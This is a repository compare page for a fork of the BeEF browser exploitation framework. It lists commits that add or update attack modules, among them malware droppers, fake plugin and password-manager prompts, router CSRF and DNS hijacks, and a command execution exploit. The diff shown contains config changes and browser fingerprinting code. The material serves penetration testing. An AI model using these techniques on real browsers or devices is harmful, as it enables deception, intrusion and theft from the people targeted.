Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.4.5
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
...
compare: Hiddenden:beef-0.4.4.8
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

104 Commits
beef-0.4.4 ... beef-0.4.4

Author SHA1 Message Date
bcoles
ce2b5293af Add support for Firefox 25 2013-11-05 14:45:27 +10:30
bcoles
05502a3c91 fix bug preventing loading of 'replace_video_fake_plugin' module 2013-11-04 15:52:54 +10:30
Michele Orru
441ccbbfce Merge pull request #941 from gcattani/LcamtufDownload 
Module Update: lcamtuf Download
 2013-10-30 10:31:57 -07:00
gcatt
f1df608f64 Module Update: lcamtuf Download 
Updated Adobe Flash Player URL to the current one.
 2013-10-30 18:29:44 +01:00
Michele Orru
24bf95ff16 Merge pull request #940 from gcattani/FakeFlashUpdate 
Module Update: Fake Flash Update
 2013-10-30 10:15:28 -07:00
gcatt
9987f0781f Module Update: Fake Flash Update 
Updated the prompted picture and part of the module.
 2013-10-30 17:05:01 +01:00
bcoles
41bfb8e995 Fix bug with Unity Web Player detection 
Fix issue #910
 2013-10-17 17:54:16 +10:30
Michele Orru
77950ae680 Merge pull request #938 from gcattani/hasUnity 
Module: Detect Unity Web Player
 2013-10-15 06:53:41 -07:00
gcatt
d4c69f2bfd Module: Detect Unity Web Player 2013-10-15 15:47:47 +02:00
bcoles
8e6751611d Add beef.browser.getPageHead() and beef.browser.getPageBody() 
Update 'Get Page HTML' module to use these functions

Tested on IE6, FF22, C28

Fix issue #518
 2013-10-13 03:37:15 +10:30
bcoles
09443675cc Fix bug in fake_notification_ff module 2013-10-12 00:43:54 +10:30
bcoles
70cac51a5d Add error check for missing dropper 2013-10-11 23:14:56 +10:30
antisnatchor
69ff8c0013 Added rubyzip dependency to core.rb. Fixed a bug in dom.js when attaching applets for IE. 2013-10-10 20:54:29 +01:00
antisnatchor
050da281ac Modified Gemfile. Added missing directory for Firefox Extension dropper module. 2013-10-10 20:47:14 +01:00
antisnatchor
5dd46ffd72 From antisnatchor with love. New module: malicious Firefox Extension dropper. Based on @mihi42 FF extension. 2013-10-10 15:18:03 +01:00
antisnatchor
45c51180a6 Completely removed deployJava ro prevent CtP issues on Firefox. 2013-10-09 16:11:27 +01:00
antisnatchor
b280d099f8 From antisnatchor with love. New module: Signed Java Applet dropper (win only for now). 2013-10-08 17:02:02 +01:00
antisnatchor
2c750670d7 fixed doctype error in basic.html (IE only) 2013-10-08 15:21:54 +01:00
antisnatchor
71a67defd4 Added new RESTful API method to bind a local file to a url. Also added "dropper" directory into Social Engineering extension. 2013-10-08 14:08:52 +01:00
bcoles
638e037e56 Remove Java and VLC detection from hook init 2013-10-06 19:17:55 +10:30
Christian Frichot
8033b77b73 Support for Chrome version 30 in browser detection 2013-10-06 17:20:01 +08:00
antisnatchor
2f51deb88a Fixed issue with Social Engineering extension when using an SMTP server without any needed authentication. 2013-10-02 14:53:04 +01:00
antisnatchor
8d44b48768 Added dependency to therubyracer (V8 implementation for Ruby) if the OS is not OSX. 2013-10-02 14:24:22 +01:00
antisnatchor
86d23d3815 Fix issue #662 the Web UI base path can now be configured in the main config.yaml. Web UI JS files are now also minified. 2013-10-01 17:16:46 +01:00
bmantra
a1f102b869 Merge pull request #933 from bmantra/master 
initial commit of the beef bind shellcode
 2013-09-28 12:18:21 -07:00
bmantra
fa95ac5b55 initial commit of the beef bind shellcode 2013-09-28 21:18:23 +02:00
Michele Orru
5980eff047 Merge pull request #931 from DinisCruz/patch-1 
adding info to read me about running beef in windows
 2013-09-27 02:10:45 -07:00
Dinis Cruz
31587f689b adding into to read me about running beef in windows 2013-09-27 00:59:36 +01:00
bcoles
5942138aba Update spyder eye module 
* file error handling
* render the screenshot in the admin UI
* log screenshot filename to master logs
 2013-09-12 18:29:56 +09:30
bcoles
189e6543e0 Fix bug with rendering images from command responses in the admin UI 2013-09-12 18:26:00 +09:30
bcoles
25aca3d291 Update 'command.js' for Spyder Eye module 2013-09-11 15:26:15 +09:30
bcoles
257a310a02 Update 'module.rb' for Spyder Eye module 2013-09-11 15:24:54 +09:30
bcoles
2420d59a72 Update 'config.yaml' for Spyder Eye module 2013-09-11 15:20:19 +09:30
Brendan Coles
66f01ff4e6 Merge pull request #930 from preth00nker/master 
adding generic module to take screenshoots with canvas
 2013-09-10 23:33:37 -07:00
Christian
3f7eec4e28 adding generic module to take screenshoots with canvas 2013-09-09 13:52:13 -05:00
Christian Frichot
1b6159ebeb New Module - Detect Internal IP with WebRTC. See Issue #929 2013-09-08 11:09:57 +08:00
Christian Frichot
df4b0bce5e Supports Chrome 29 detection 2013-09-07 12:56:21 +08:00
Saafan
d872a5a3e7 Merge remote-tracking branch 'origin/master' into Detect-Java 
Conflicts:
	core/main/client/browser.js
 2013-08-20 05:55:27 -04:00
bcoles
f5b86e7894 Add metasploit default path for kali 2013-08-19 12:37:35 +09:30
bcoles
db83cdd086 Add metasploit default path for pentoo - take 2 2013-08-19 12:37:06 +09:30
bcoles
e9e085e9e1 Add metasploit default path for pentoo 2013-08-17 21:56:42 +09:30
Brendan Coles
62a5d5e96c Merge pull request #927 from thefinn93/spellingfix 
Correct minor typo in the default config.yml
 2013-08-11 02:22:52 -07:00
Finn Herzfeld
173178e1d6 Updated text as requested by bcoles 2013-08-11 00:07:59 -07:00
bcoles
f2883e0c94 Fixed typo 
Extra 'i' from vim insert mode
 2013-08-09 13:34:24 +09:30
bcoles
858814c614 Update BeEF core to complete HTTPS support 
Part of issue #745
 2013-08-09 13:28:35 +09:30
bcoles
21417dc3e2 Update BeEF server protocol for multiple modules to use 
`beef.http.https.enable`

Now uses the `beef.net.httpproto` value rather than a hard-coded
protocol string.

Part of issue #745
 2013-08-09 13:21:33 +09:30
Finn Herzfeld
ca8f5d37e1 Corrected minor typo 2013-08-06 17:03:17 -07:00
bcoles
c6314f97cb Update version to beef-0.4.4.7-alpha 2013-08-04 16:45:24 +09:30
Brendan Coles
1a5b21765f Merge pull request #924 from phihag/install-pipeline-instead-of-fifo 
Use a pipe instead of a fifo during installation
 2013-08-04 00:54:26 -07:00
Brendan Coles
9fe27b113f Merge pull request #923 from phihag/install-abort-on-error 
Update install to abort on error
 2013-08-04 00:52:56 -07:00
Saafan
402f4997df Fixing java support by separating Oracle deployement toolkit in a separate file. #786 2013-08-03 16:25:46 -04:00
Philipp Hagemeister
3948750571 Use a pipe instead of a fifo during installation 
bash's anonymous fifos are only available if devfs is mounted.
On a system without /dev mounted (which is perfectly reasonable for a locked-down security testing machine), installing beef fails with (after applying #923)

    install-beef: line 81: /dev/fd/62: No such file or directory

This commit fixes and lets the installation run through.
 2013-08-01 17:33:09 +02:00
Philipp Hagemeister
957510b6d9 Abort on error 
On a (debian) system without sudo, lots of messages rush by, and it's not obvious was fails.
With this change, the log looks like:

    $ bash install-beef
    bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
    ======================================
               BeEF Installer
    ======================================

    CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environemnt and it's dependencies.

    In rare cases, this may lead to unexpected behaviour or package conflicts on some systems.

    Are you sure you wish to continue (Y/n)?

    Detecting OS..
    Debian/Ubuntu Detected
    Installing Prerequisite Packages..
    install-beef: line 74: sudo: command not found

which is far more informative.
 2013-08-01 17:30:00 +02:00
Christian Frichot
7f64c94e03 New Module - Fake LastPass Dialog 2013-07-21 13:53:44 +08:00
Christian Frichot
82a70fbcd0 Detect LastPass module (except on IE) - #802 2013-07-20 13:58:20 +08:00
Christian Frichot
a22926bc53 Merge remote-tracking branch 'origin/master' 2013-07-08 19:41:10 +08:00
bcoles
2c2b9a85f4 Update browser fingerprinting module firefox signatures 2013-07-08 10:57:02 +09:30
bcoles
dd811ca234 Add proxy detection using http headers to browser details 
Add proxy details to browser log

Part of issue #527

Note: does not work for transparent proxies
 2013-07-08 00:25:49 +09:30
Christian Frichot
acfdf45d16 Merge remote-tracking branch 'origin/master' 2013-07-06 15:10:43 +08:00
bcoles
e88c3c1f86 Add fake_notification_c module 
Part of issue #695
 2013-07-05 01:17:20 +09:30
bcoles
32b48e5172 Add some client-side debugging to browser.js 
Perform minor code formatting changes
 2013-07-04 23:50:34 +09:30
bcoles
b16d7e3563 Add fake_notification_ff module 
Rename fake_notification module to fake_notification_ie
 2013-07-04 23:12:01 +09:30
Christian Frichot
7e73c0a532 Merge remote-tracking branch 'origin/master' 2013-07-04 20:14:29 +08:00
bcoles
1bddb00ec8 Add Replace Video (Fake Plugin) module 
Fix issue #695
 2013-07-04 11:54:52 +09:30
bcoles
9daacd799e Update version to beef-0.4.4.7 2013-07-04 08:20:05 +09:30
bcoles
4fe51dcd28 Update version to '0.4.4.6.1-alpha' bug fix edition 2013-07-04 08:17:17 +09:30
bcoles
af6cf9e5d4 Add Firefox 23 and 24 support for Firefox aurora/beta users 
Firefox 23 ETA August 2013
Firefox 24 ETA September 2013
 2013-07-04 07:39:23 +09:30
BWZ
3705009982 LiveCD - updade bundles during beef update 
Fixes #918
 2013-07-02 18:19:41 +10:00
antisnatchor
7f1473ccbf Added detection for Firefox 22 (and improved detection of FF 21/22 with a new DOM object). 2013-07-01 17:32:00 +01:00
antisnatchor
f869d2924a Fixed an XSS discovered by Mario in the default keylogger. 2013-07-01 15:24:36 +01:00
Christian Frichot
0b1c753bd3 Merge remote-tracking branch 'origin/master' 2013-07-01 16:22:20 +08:00
gcatt
f6ebe9fac0 Revert "Add Unity Web Player detection" 
This reverts commit 696e3715fe.
 2013-07-01 10:11:20 +02:00
Christian Frichot
570a8266ed Merge remote-tracking branch 'origin/master' 2013-07-01 16:10:33 +08:00
gcatt
696e3715fe Add Unity Web Player detection 2013-07-01 10:07:47 +02:00
Christian Frichot
53536d9d86 Merge remote-tracking branch 'origin/master' 2013-07-01 07:04:42 +08:00
bcoles
e61b266921 update version 2013-07-01 00:42:47 +09:30
bmantra
8cf17b01a5 Merge pull request #916 from bmantra/master 
added option to use only LF in the bind shell module for use with Linux
 2013-06-28 11:43:27 -07:00
bmantra
164ff5bea6 added option for LF only, to use with Linux 2013-06-28 20:42:53 +02:00
Michele Orru
6c6a33db50 Merge pull request #915 from Nbblrr/master 
DNS Enumeration modules does not consider the user timeout parameter
 2013-06-28 05:48:54 -07:00
Nbblrr
e95c74b5e1 DNS Enumeration module does not consider the user timeout parameter 2013-06-28 14:33:33 +02:00
Michele Orru
c70fa80468 Merge pull request #911 from gcattani/910-HasUnity 
Add Unity Web Player detection
 2013-06-19 03:06:42 -07:00
gcatt
1be8ec12fd Add Unity Web Player detection 2013-06-18 23:59:43 +02:00
Christian Frichot
0dd499c71a Updated browser detection to capture Chrome under iOS. See Issue #909 2013-06-16 16:19:58 +08:00
Christian Frichot
dab58f0e61 Updated hardware constants better detects and displays pure Nexus phones. Issue #908 2013-06-16 14:49:39 +08:00
Christian Frichot
2e68470d23 Android OS Icon should now display. See Issue #907 2013-06-16 14:27:12 +08:00
Christian Frichot
473f349394 Missing apostrophe in PHP-5.3.9-dos module.rb. This was breaking Rake. Make sure you run rake peeps before pushing! 2013-06-15 13:48:05 +08:00
Christian Frichot
dbebf12d27 Update to browser_filter. See Issue #906 2013-06-15 13:45:24 +08:00
Christian Frichot
96f763b7e0 Chrome 27/28 detection. Fixes Issue #905 2013-06-15 13:41:41 +08:00
bcoles
d40486c391 Add airlive_ip_camera_csrf module 2013-06-14 15:28:35 +09:30
Brendan Coles
d43f443555 Merge pull request #904 from Nbblrr/master 
Add modules for detecting MS Office version and Bitdefender 2012

Fix issue #902
Fix issue #903
 2013-06-13 22:38:37 -07:00
Nbblrr
2b473bfda9 Add module which detect MS Office version. Closes #903 2013-06-14 00:39:39 +02:00
Nbblrr
a2b627c8ae Add module to detect bitdefender 2012. Closes #902 2013-06-14 00:07:00 +02:00
bcoles
dbabb379fb Add Iceweasel detection in browser.js 2013-06-02 05:14:33 +09:30
bcoles
5252bea54a Add Get Form Values module 
This module retrieves the name, type, and value of all input
fields for all forms on the page.
 2013-06-02 05:11:45 +09:30
bcoles
7fdfcc3ef0 Add beef.browser.isA() to avant_steal_history module 
Part of issue #774
 2013-06-02 03:19:05 +09:30
bcoles
3c5b68e112 Add beef.browser.isA() to detect Avant Browser 
Fixes issue #774
 2013-06-02 03:14:29 +09:30
Michele Orru
9e17958268 Merge pull request #900 from james-otten/master 
Added Actiontec Q1000 router CSRF module
 2013-05-31 02:36:40 -07:00
James Otten
f2efa533c8 Added Actiontec Q1000 CSRF module 2013-05-30 15:49:47 -05:00
Christian Frichot
9636cb0972 Updated Gmail detection URL. Fixes #Issue 899 2013-05-28 20:34:56 +08:00
bcoles
1dc59f7b01 Add D-Link ShareCenter command execution exploit module 2013-05-27 13:50:12 +09:30
bcoles
ff620d42f4 Add belkin_dns_csrf DNS hijack module 
Part of issue #538
 2013-05-27 12:50:06 +09:30
bcoles
61e6337046 Remove zenoss_daemon_csrf module 2013-05-27 12:14:27 +09:30
bcoles
639d0611a6 Add command_id to embedded iframe/img IDs for router exploits 
This prevents a race condition where duplicate iframes/imgs are
created if a module is run twice simultaneously. The second iframe/img
was not being removed during `cleanup()`.
 2013-05-27 11:56:01 +09:30
bcoles
ab7a62e8a4 Update version 2013-05-27 10:40:58 +09:30
221 changed files with 8877 additions and 558 deletions
Expand all files Collapse all files

7
Gemfile
View File

@@ -16,7 +16,11 @@ gem "thin"
gem "sinatra", "1.4.2"
gem "rack", "1.5.2"
gem "em-websocket", "~> 0.3.6"
gem "jsmin", "~> 1.0.1"
gem "uglifier", "~> 2.2.1"
# install https://github.com/cowboyd/therubyracer if the OS is != than OSX
if !RUBY_PLATFORM.downcase.include?("darwin")
gem "therubyracer", "~> 0.12.0"
end
gem "ansi"
gem "term-ansicolor", :require => "term/ansicolor"
gem "dm-core"
@@ -27,6 +31,7 @@ gem "parseconfig"
gem "erubis"
gem "dm-migrations"
gem "msfrpc-client"
gem "rubyzip", "~> 1.0.0"
# notifications
gem "twitter"

3
README.mkd
View File

@@ -72,3 +72,6 @@ To get started, simply execute beef and follow the instructions:
$ ./beef
On windows use
$ ruby beef

2
VERSION
View File

@@ -4,4 +4,4 @@
# See the file 'doc/COPYING' for copying permission
#
0.4.4.5-alpha
0.4.4.8-alpha

6
config.yaml
View File

@@ -6,7 +6,7 @@
# BeEF Configuration file
beef:
version: '0.4.4.5-alpha'
version: '0.4.4.8-alpha'
debug: false
restrictions:
@@ -30,7 +30,7 @@ beef:
# DNS
dns_host: "localhost"
dns_port: 53
panel_path: "/ui/panel"
web_ui_basepath: "/ui"
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
@@ -44,7 +44,7 @@ beef:
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
secure: true # use 'WebSocketSecure' works only on HTTPS domains and with HTTPS support enabled in BeEF
port: 61985 # WS: good success rate through proxies
secure_port: 61986 # WSSecure
ws_poll_timeout: 1000 # poll BeEF every second

1
core/bootstrap.rb
View File

@@ -45,6 +45,7 @@ require 'core/main/rest/handlers/modules'
require 'core/main/rest/handlers/categories'
require 'core/main/rest/handlers/logs'
require 'core/main/rest/handlers/admin'
require 'core/main/rest/handlers/server'
require 'core/main/rest/api'
## @note Include Websocket

3
core/core.rb
View File

@@ -37,4 +37,7 @@ require 'core/main/migration'
require 'core/main/console/commandline'
require 'core/main/console/banners'
# @note Include rubyzip lib
require 'zip'

6
core/filters/browser.rb
View File

@@ -22,7 +22,7 @@ module Filters
def self.is_valid_browsertype?(str)
return false if not is_non_empty_string?(str)
return false if str.length < 10
return false if str.length > 50
return false if str.length > 250
return false if has_non_printable_char?(str)
true
end
@@ -123,9 +123,9 @@ module Filters
return true if not is_non_empty_string?(str)
return false if str.length > 1000
if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
else
return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
end
end

399
core/main/client/browser.js
View File

@@ -19,6 +19,22 @@ beef.browser = {
return navigator.userAgent;
},
/**
* Returns true if Avant Browser.
* @example: beef.browser.isA()
*/
isA:function () {
return window.navigator.userAgent.match(/Avant TriCore/) != null;
},
/**
* Returns true if Iceweasel.
* @example: beef.browser.isI()
*/
isI:function () {
return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null;
},
/**
* Returns true if IE6.
* @example: beef.browser.isIE6()
@@ -241,7 +257,39 @@ beef.browser = {
* @example: beef.browser.isFF21()
*/
isFF21:function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/21\./) != null;
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null;
},
/**
* Returns true if FF22
* @example: beef.browser.isFF22()
*/
isFF22:function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null;
},
/**
* Returns true if FF23
* @example: beef.browser.isFF23()
*/
isFF23:function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null;
},
/**
* Returns true if FF24
* @example: beef.browser.isFF24()
*/
isFF24:function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null;
},
/**
* Returns true if FF25
* @example: beef.browser.isFF25()
*/
isFF25:function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/25\./) != null;
},
/**
@@ -249,7 +297,7 @@ beef.browser = {
* @example: beef.browser.isFF()
*/
isFF:function () {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25();
},
/**
@@ -404,6 +452,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false);
},
/**
* Returns true if Chrome for iOS 19.
* @example: beef.browser.isC19iOS()
*/
isC19iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false);
},
/**
* Returns true if Chrome 20.
* @example: beef.browser.isC20()
@@ -412,6 +468,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false);
},
/**
* Returns true if Chrome for iOS 20.
* @example: beef.browser.isC20iOS()
*/
isC20iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false);
},
/**
* Returns true if Chrome 21.
* @example: beef.browser.isC21()
@@ -420,6 +484,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false);
},
/**
* Returns true if Chrome for iOS 21.
* @example: beef.browser.isC21iOS()
*/
isC21iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false);
},
/**
* Returns true if Chrome 22.
* @example: beef.browser.isC22()
@@ -428,6 +500,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false);
},
/**
* Returns true if Chrome for iOS 22.
* @example: beef.browser.isC22iOS()
*/
isC22iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false);
},
/**
* Returns true if Chrome 23.
* @example: beef.browser.isC23()
@@ -436,6 +516,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false);
},
/**
* Returns true if Chrome for iOS 23.
* @example: beef.browser.isC23iOS()
*/
isC23iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false);
},
/**
* Returns true if Chrome 24.
* @example: beef.browser.isC24()
@@ -444,6 +532,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
},
/**
* Returns true if Chrome for iOS 24.
* @example: beef.browser.isC24iOS()
*/
isC24iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false);
},
/**
* Returns true if Chrome 25.
* @example: beef.browser.isC25()
@@ -452,6 +548,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
},
/**
* Returns true if Chrome for iOS 25.
* @example: beef.browser.isC25iOS()
*/
isC25iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false);
},
/**
* Returns true if Chrome 26.
* @example: beef.browser.isC26()
@@ -460,12 +564,84 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
},
/**
* Returns true if Chrome for iOS 26.
* @example: beef.browser.isC26iOS()
*/
isC26iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false);
},
/**
* Returns true if Chrome 27.
* @example: beef.browser.isC27()
*/
isC27:function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false);
},
/**
* Returns true if Chrome for iOS 27.
* @example: beef.browser.isC27iOS()
*/
isC27iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false);
},
/**
* Returns true if Chrome 28.
* @example: beef.browser.isC28()
*/
isC28:function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false);
},
/**
* Returns true if Chrome for iOS 28.
* @example: beef.browser.isC28iOS()
*/
isC28iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
},
/**
* Returns true if Chrome 29.
* @example: beef.browser.isC29()
*/
isC29:function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 29) ? true : false);
},
/**
* Returns true if Chrome for iOS 29.
* @example: beef.browser.isC29iOS()
*/
isC29iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 29) ? true : false);
},
/**
* Returns true if Chrome 30.
* @example: beef.browser.isC30()
*/
isC30:function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 30) ? true : false);
},
/**
* Returns true if Chrome for iOS 30.
* @example: beef.browser.isC30iOS()
*/
isC30iOS:function () {
